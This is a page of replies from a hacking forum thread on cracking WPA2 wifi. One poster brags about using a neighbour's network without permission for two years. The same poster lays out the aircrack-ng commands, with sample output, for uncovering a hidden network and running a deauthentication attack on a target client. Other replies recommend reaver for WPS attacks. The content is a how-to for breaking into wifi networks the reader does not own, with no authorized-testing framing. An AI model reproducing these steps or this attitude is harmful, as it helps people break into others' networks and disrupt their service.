Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


cracking WPA2 without dictionary! filter_list
Author
Message
RE: cracking WPA2 without dictionary! #21
Nice Tutorial .

Reply

RE: cracking WPA2 without dictionary! #22
Nice Tutorial .

Reply

RE: cracking WPA2 without dictionary! #23
this one seems hard to work with eh.

Reply

RE: cracking WPA2 without dictionary! #24
this one seems hard to work with eh.

Reply

RE: cracking WPA2 without dictionary! #25
this one seems hard to work with eh.

Reply

RE: cracking WPA2 without dictionary! #26
this one seems hard to work with eh.

Reply

RE: cracking WPA2 without dictionary! #27
Method #2 implies that the target AP has WPS enabled and is not patched against this attack..

Reply

RE: cracking WPA2 without dictionary! #28
Now i am using my neighbour wifi for free its totaly near to 2 years. .

Just use my brain to crack it lol...
They have change the pssword for several times and similar.
[Image: ph4ntomnuk3r_zps3b19e76d.gif]

Reply

RE: cracking WPA2 without dictionary! #29
(11-06-2013, 07:03 PM)blackboy104 Wrote: my target AP has wps: no when i use command: wash -i mon0 -C, but the result of using reaver was: Warning: Failed to associate with bssid (essid: xxxxxxx). in the past, i've successfully hacked this AP. but now, i cannot. can you help me?

done use single tools to attack. .
use another program to

do you get bssid:00:00:00:00:00:00 <this is hidden> its mac protected!

use this tools. .
(backtrack)

cmd:airodump-ng wlan1

The readout should be something like this:

CH 9 ][ BAT: 2 hours 18 mins ][ Elapsed: 8 s ][ 2013-11-6 04:55

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:91 -28 19 1 0 6 54e WPA2 CCMP PSK linksys
28:EF:01:35:34:85 -41 17 0 0 6 54e WPA2 CCMP PSK <length: 6>
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0



2) u will see the hidden bssid and use this cmd:

airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1

explanation of the switches are

-c = channel of target access point
--bssid = MAC address from the target access point


The airdump-ng readout should look like now:

CH 6 ][ BAT: 2 hours 18 mins ][ Elapsed: 8 s ][ 2013-11-6 04:55

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6>

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0 1

Now open a new terminal window and leave airodump-ng running.

Run this cmd in the new terminal. :-

aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

this cmd are as follows

-0 = Attack mode 0= de-authentication (The number following this indicates the number of packets.)
-a = Target access point mac address
-c = Target client mac address

Now switch back to the original terminal window that still has airodump-ng running.

This is what it should now look like:

CH 6 ][ BAT: 2 hours 18 mins ][ Elapsed: 8 s ][ 2013-11-6 04:55

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK hacked

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0 1 hacked



If it does not work the first time try aireplay-ng again until it works .. :Smile:
[Image: ph4ntomnuk3r_zps3b19e76d.gif]

Reply

RE: cracking WPA2 without dictionary! #30
You should try using Reaver it hack wifi threw WPS.

Reply







Users browsing this thread: 1 Guest(s)